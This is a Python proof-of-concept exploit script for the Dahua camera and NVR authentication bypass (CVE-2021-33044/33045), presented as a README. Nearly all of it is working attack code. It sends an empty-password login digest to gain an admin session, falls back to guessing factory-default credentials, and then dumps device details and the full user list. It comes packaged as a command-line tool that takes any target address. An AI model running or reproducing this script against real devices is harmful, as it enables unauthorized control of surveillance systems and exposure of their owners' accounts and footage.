README.md
Rendering markdown...
#!/usr/bin/env python3
"""
Dahua Authentication Bypass PoC
CVE-2021-33044 & CVE-2021-33045
Real vulnerability (Source: NVD / Dahua Security Advisory DSA-2021-001):
"The identity authentication bypass vulnerability found in some Dahua products
during the login process. Attackers can bypass device identity authentication
by constructing malicious data packets."
CVSS: 9.8 CRITICAL | CWE-287 (Improper Authentication)
In CISA Known Exploited Vulnerabilities Catalog (added 2024-08-21)
Ref: https://packetstormsecurity.com/files/164423/Dahua-Authentication-Bypass.html
http://seclists.org/fulldisclosure/2021/Oct/13
CVE-2021-33044: Affects IPC-HUM7xxx, IPC-HX3xxx, IPC-HX5xxx, TPC-*, VTO-*, VTH-*
Firmware < 2.820.0000000.5.r.210705 (IPC) / 2.630.x (TPC)
CVE-2021-33045: Same IPC models PLUS NVR-1xxx/2xxx/4xxx/5xxx/6xx, XVR-4x*/5x*/7x*
Firmware < 4.001.x
Attack method: The RPC2 login challenge-response uses:
step1 = MD5("user:realm:PASSWORD") <- attacker leaves PASSWORD empty
step2 = MD5("step1:random:step1")
Vulnerable firmware incorrectly accepts step1 computed with an empty password,
granting full admin access without knowing the actual password.
"""
import requests
import hashlib
import json
import argparse
import sys
# Silence urllib3 warnings for the whole process; every request in this file
# is sent with verify=False.
requests.packages.urllib3.disable_warnings()
# ---------------------------------------------------------------------------
# RPC2 helpers
# ---------------------------------------------------------------------------
def rpc2_get_challenge(target, port, timeout=8, http=None):
    """
    Request a login challenge from the device's /RPC2_Login endpoint.

    Posts a ``global.login`` request for user ``admin`` with an empty
    password and reads ``realm`` and ``random`` from the reply's ``params``.

    Args:
        target: Host name or IP address.
        port: HTTP port.
        timeout: Per-request timeout in seconds.
        http: Optional object exposing ``post`` (e.g. a ``requests.Session``);
            the ``requests`` module itself is used when omitted.

    Returns:
        ``(realm, random, reply)`` where ``reply`` is the decoded JSON body;
        ``realm``/``random`` default to ``""`` when absent.  On any exception
        the result is ``(None, None, <error text>)``.
    """
    endpoint = f"http://{target}:{port}/RPC2_Login"
    login_params = {
        "userName": "admin",
        "password": "",
        "clientType": "Web3.0",
        "loginType": "Direct",
        "authorityType": "Default",
        "passwordType": "Default",
    }
    body = {
        "method": "global.login",
        "params": login_params,
        "id": 1,
        "session": 0,
    }
    try:
        client = http or requests
        reply = client.post(endpoint, json=body, timeout=timeout, verify=False).json()
        challenge = reply.get("params", {})
        return challenge.get("realm", ""), challenge.get("random", ""), reply
    except Exception as exc:
        # Best-effort probe: report the failure as text instead of raising.
        return None, None, str(exc)
def rpc2_bypass_hash(username, realm, random_str):
    """
    Compute the two-stage login digest with the password component left empty.

    Stage 1 is ``MD5("{username}:{realm}:")`` and stage 2 is
    ``MD5("{stage1}:{random_str}:{stage1}")``; both are upper-case hex.

    Returns:
        The stage-2 digest as a 32-character upper-case hex string.
    """
    inner_text = "{}:{}:".format(username, realm)
    inner = hashlib.md5(inner_text.encode()).hexdigest().upper()

    outer_text = "{0}:{1}:{0}".format(inner, random_str)
    return hashlib.md5(outer_text.encode()).hexdigest().upper()
def rpc2_legit_hash(username, password, realm, random_str):
    """
    Compute the two-stage login digest for a known username/password pair.

    Stage 1 is ``MD5("{username}:{realm}:{password}")`` and stage 2 is
    ``MD5("{stage1}:{random_str}:{stage1}")``; both are upper-case hex.

    Returns:
        The stage-2 digest as a 32-character upper-case hex string.
    """
    credential_text = "{}:{}:{}".format(username, realm, password)
    inner = hashlib.md5(credential_text.encode()).hexdigest().upper()

    response_text = "{0}:{1}:{0}".format(inner, random_str)
    return hashlib.md5(response_text.encode()).hexdigest().upper()
def rpc2_send_login(target, port, username, pw_hash, session=0, timeout=8, http=None):
    """
    Submit a ``global.login`` request carrying a pre-computed digest.

    Args:
        target: Host name or IP address.
        port: HTTP port.
        username: Value sent as ``userName``.
        pw_hash: Value sent as ``password``.
        session: Session identifier placed in the request envelope.
        timeout: Per-request timeout in seconds.
        http: Optional object exposing ``post`` (e.g. a ``requests.Session``);
            the ``requests`` module itself is used when omitted.

    Returns:
        The decoded JSON reply, or ``{"error": <error text>}`` if anything
        raised while sending or decoding.
    """
    endpoint = f"http://{target}:{port}/RPC2_Login"
    login_params = {
        "userName": username,
        "password": pw_hash,
        "clientType": "Web3.0",
        "loginType": "Direct",
        "authorityType": "Default",
        "passwordType": "Default",
    }
    body = {
        "method": "global.login",
        "params": login_params,
        "id": 2,
        "session": session,
    }
    try:
        client = http or requests
        return client.post(endpoint, json=body, timeout=timeout, verify=False).json()
    except Exception as exc:
        # Failures are reported in-band so callers can keep a single code path.
        return {"error": str(exc)}
# ---------------------------------------------------------------------------
# Core bypass
# ---------------------------------------------------------------------------
def exploit_auth_bypass(target, port=80, timeout=8):
    """
    Run the challenge / empty-password-digest login sequence against a target.

    Fetches a challenge with ``rpc2_get_challenge``, builds a digest with
    ``rpc2_bypass_hash`` for user ``admin`` and submits it with
    ``rpc2_send_login``, printing progress along the way.

    Args:
        target: Host name or IP address.
        port: HTTP port (default 80).
        timeout: Per-request timeout in seconds.

    Returns:
        ``(success, session_id, response)``.  ``success`` is True only when
        the login reply has ``"result": True``; otherwise ``session_id`` is
        None and ``response`` is the last reply (or error text) received.
    """
    # Context manager so the pooled connection is released on every exit path.
    with requests.Session() as http:
        http.verify = False
        print(f"[*] Probing RPC2 challenge from {target}:{port} ...")
        realm, random_str, raw1 = rpc2_get_challenge(target, port, timeout, http=http)
        if not realm:
            print(f"[-] Could not reach RPC2_Login: {raw1}")
            return False, None, raw1

        sess = raw1.get("session", 0) if isinstance(raw1, dict) else 0
        print(f"[+] Challenge realm='{realm}' random='{random_str}' session={sess}")

        bypass_hash = rpc2_bypass_hash("admin", realm, random_str)
        print(f"[*] Sending bypass hash (empty-password): {bypass_hash}")
        resp = rpc2_send_login(target, port, "admin", bypass_hash, sess, timeout, http=http)

    if isinstance(resp, dict) and resp.get("result") is True:
        session_id = resp.get("session", "")
        print("\n[!!!] BYPASS SUCCESSFUL (CVE-2021-33044/33045)")
        print(f"[!!!] Session ID : {session_id}")
        return True, session_id, resp

    # "error" is a dict when the device answered, but rpc2_send_login puts a
    # plain string there on transport failure; the reply may also not be a
    # dict at all.  Handle every shape instead of calling .get() blindly.
    err = resp.get("error") if isinstance(resp, dict) else resp
    if isinstance(err, dict):
        code, message = err.get("code"), err.get("message")
    else:
        code, message = None, err
    print(f"[-] Bypass rejected code={code} msg={message}")
    print(" Target may be patched or RPC2 is not on this port.")
    return False, None, resp
def test_default_creds(target, port=80, timeout=8):
    """
    Try a fixed list of username/password pairs against the RPC2 login.

    One challenge is fetched with ``rpc2_get_challenge`` and reused for every
    pair; each attempt is hashed with ``rpc2_legit_hash`` and submitted with
    ``rpc2_send_login``.

    Returns:
        ``(user, password, session)`` for the first pair whose reply has
        ``"result": True``; ``None`` when no challenge could be obtained or
        no pair is accepted.
    """
    candidates = (
        ("admin", ""),
        ("admin", "admin"),
        ("admin", "888888"),
        ("admin", "666666"),
        ("admin", "123456"),
        ("666666", "666666"),
        ("888888", "888888"),
    )

    client = requests.Session()
    client.verify = False

    print("\n[*] Trying default credentials ...")
    realm, nonce, challenge = rpc2_get_challenge(target, port, timeout, http=client)
    if not realm:
        print("[-] RPC2 unreachable skipping")
        return None

    # The challenge is the decoded reply on success; anything else means no session.
    session = challenge.get("session", 0) if isinstance(challenge, dict) else 0

    for username, password in candidates:
        digest = rpc2_legit_hash(username, password, realm, nonce)
        reply = rpc2_send_login(target, port, username, digest, session, timeout, http=client)
        if reply.get("result") is not True:
            continue
        print(f"[+] Valid credentials: {username}:{password!r}")
        return (username, password, reply.get("session"))

    print("[-] No default credentials matched")
    return None
# ---------------------------------------------------------------------------
# Post-exploitation
# ---------------------------------------------------------------------------
def rpc2_call(target, port, session_id, method, params=None, timeout=8):
    """
    POST a single JSON request to the device's /RPC2 endpoint.

    Args:
        target: Host name or IP address.
        port: HTTP port.
        session_id: Value sent in the ``session`` field.
        method: RPC method name.
        params: Optional parameters; an empty dict is sent when falsy.
        timeout: Per-request timeout in seconds.

    Returns:
        The decoded JSON reply, or ``{"error": <error text>}`` if anything
        raised while sending or decoding.
    """
    endpoint = f"http://{target}:{port}/RPC2"
    body = {
        "method": method,
        "params": params or {},
        "session": session_id,
        "id": 10,
    }
    try:
        reply = requests.post(endpoint, json=body, timeout=timeout, verify=False)
        return reply.json()
    except Exception as exc:
        return {"error": str(exc)}
def dump_info(target, port, session_id):
    """
    Print the replies of a few read-only RPC2 queries for a given session.

    Calls ``rpc2_call`` for three ``magicBox`` getters and then for
    ``userManager.getUserInfoAll``, printing each reply; the last one is
    pretty-printed as JSON.  Returns ``None``.
    """
    info_methods = (
        "magicBox.getDeviceType",
        "magicBox.getSoftwareVersion",
        "magicBox.getSystemInfo",
    )

    print("\n[*] Dumping device info ...")
    for name in info_methods:
        reply = rpc2_call(target, port, session_id, name)
        print(f" {name}: {reply}")

    print("\n[*] Dumping user list ...")
    users = rpc2_call(target, port, session_id, "userManager.getUserInfoAll")
    rendered = json.dumps(users, indent=2)
    print(f" Users: {rendered}")
# ---------------------------------------------------------------------------
# CLI
# ---------------------------------------------------------------------------
def main():
    """
    Command-line entry point.

    Parses ``target``, ``-p/--port``, ``--dump`` and ``--timeout``, prints a
    banner, runs ``exploit_auth_bypass`` and falls back to
    ``test_default_creds`` when that fails.  With ``--dump`` and a session,
    ``dump_info`` is called.  Exits with status 0 on success, 1 otherwise.
    """
    usage_examples = (
        "\n"
        "Examples:\n"
        "python dahua_auth_bypass.py 192.168.1.100\n"
        "python dahua_auth_bypass.py 192.168.1.100 -p 8080\n"
        "python dahua_auth_bypass.py 192.168.1.100 --dump\n"
    )
    cli = argparse.ArgumentParser(
        description="Dahua Auth Bypass PoC CVE-2021-33044 / CVE-2021-33045",
        formatter_class=argparse.RawDescriptionHelpFormatter,
        epilog=usage_examples,
    )
    cli.add_argument("target", help="Camera IP or hostname")
    cli.add_argument("-p", "--port", type=int, default=80, help="HTTP port (default: 80)")
    cli.add_argument(
        "--dump",
        action="store_true",
        help="After bypass, dump device info and user list",
    )
    cli.add_argument("--timeout", type=int, default=8)
    opts = cli.parse_args()

    banner = (
        "\n"
        "Dahua Auth Bypass PoC\n"
        "CVE-2021-33044 / CVE-2021-33045\n"
        "CVSS 9.8 CRITICAL CWE-287\n"
        f"Target : {opts.target}:{opts.port}\n"
    )
    print(banner)

    success, session_id, _ = exploit_auth_bypass(opts.target, opts.port, opts.timeout)
    if not success:
        fallback = test_default_creds(opts.target, opts.port, opts.timeout)
        if fallback:
            success = True
            session_id = fallback[2]

    if success and session_id and opts.dump:
        dump_info(opts.target, opts.port, session_id)

    exit_code = 0 if success else 1
    sys.exit(exit_code)
# Run the CLI only when executed as a script, not when imported.
if __name__ == "__main__":
    main()